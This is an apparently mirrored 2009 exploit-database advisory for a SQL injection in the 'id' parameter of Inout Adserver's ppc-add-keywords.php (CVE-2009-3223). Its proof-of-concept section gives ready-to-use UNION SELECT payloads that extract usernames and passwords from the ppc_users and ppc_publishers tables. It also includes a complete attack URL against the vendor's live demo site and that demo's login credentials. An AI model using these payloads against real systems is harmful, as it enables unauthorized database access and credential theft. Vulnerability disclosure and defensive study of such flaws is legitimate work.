Inout Adserver - 'id' SQL Injection



EKU-ID: 17048 CVE: OSVDB-56560;CVE-2009-3223 OSVDB-ID:
Author: boom3rang Published: 2009-07-27 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


# Inout Adserver (id) Remote SQL injection                         [_][-][X]
      _  ___  _  ___      ___ ___ _____      __  ___ __   __  ___
     | |/ / || |/ __|___ / __| _ \ __\ \    / / |_  )  \ /  \/ _ \
     | ' <| __ | (_ |___| (__|   / _| \ \/\/ /   / / () | () \_, /
     |_|\_\_||_|\___|    \___|_|_\___| \_/\_/   /___\__/ \__/ /_/


      Red n'black i dress eagle on my chest.
      It's good to be an ALBANIAN Keep my head up high for that flag i die.
      Im proud to be an ALBANIAN
   ########################################################################

       Author             : boom3rang
       Contact            : boom3rang[at]live.com
       Greetz             : H!tm@N - KHG - cHs

                  R.I.P redc00de
   ------------------------------------------------------------------------

                  Affected software description
       Software 	: Inout Adserver
       Vendor		: http://www.inoutscripts.com/products/adserver/
       Price 	      	: Just $99.95
       Version Vuln.   : /

   ------------------------------------------------------------------------

                 Proof Of Concept!
               --------------------

= NOTE!! =
########################################################################################
First you need to create an Advertiser account to the site, it's free, then you need "login" to execute this exploit!
########################################################################################

Dork: N/W
---------------------------------------------------------------------------------------
SQLi:
http://localhost/PATH/ppc-add-keywords.php?id= [ Exploit ]
---------------------------------------------------------------------------------------
Exploit:
   1+union+all+select+concat(username,char(58),password),2,3,null+from+ppc_users--

   1+union+all+select+concat(username,char(58),password),2,3,null+from+ppc_publishers--
---------------------------------------------------------------------------------------

Example:
http://localhost/PATH/ppc-add-keywords.php?id=1+union+all+select+concat(username,char(58),password),2,3,null+from+ppc_users--

---------------------------------------------------------------------------------------

LiveDemo:

Advertiser Demo Login!
Username : advertiser
Password : advertiser

http://www.inoutscripts.com/demo/inout_adserver/ppc-add-keywords.php?id=348+union+all+select+concat(username,char(58),password),2,3,null+from+ppc_users--

# milw0rm.com [2009-07-27]